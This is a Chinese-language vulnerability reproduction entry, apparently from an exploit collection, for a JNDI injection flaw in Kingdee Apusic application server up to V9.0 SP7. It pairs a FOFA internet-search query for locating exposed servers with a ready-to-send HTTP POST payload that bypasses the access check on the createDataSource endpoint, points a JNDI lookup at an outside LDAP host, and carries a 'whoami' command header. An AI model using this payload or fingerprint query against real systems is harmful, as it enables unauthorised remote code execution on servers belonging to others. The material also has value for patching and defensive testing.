J17-3金蝶-Apusic应用服务器-JNDI注入
漏洞描述:
由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向createDataSource接口执行JNDI注入,造成远程代码执行。利用该漏洞需低版本JDK且需要服务器上有数据库驱动。
影响版本:
金蝶Apusic应用服务器 <= V9.0 SP7
不受影响版本
金蝶Apusic应用服务器 > V9.0 SP7
网站图片:
网络测绘:
fofa语法:
body=“easSessionId” || header=“easportal” || header=“eassso/login” || banner=“eassso/login” || body=“/eassso/common” || (title=“EAS系统登录” && body=“金蝶”) || header=“EASSESSIONID” || banner=“EASSESSIONID”
漏洞复现:
payload:
POST /admin/;//protect/datasource/createDataSource HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded
cmd: whoami
name=jndi1&jndiName=ldap://dnslog.pw&dbtype=mysql&drivertype=&host=127.0.0.1&port=3306&dbname=jndi&userName=jndi&password=jndi&repassword=jndi&connectionURL=jndi&driverClassName=java.lang.String&testCommand=
效果图:
Dnslog验证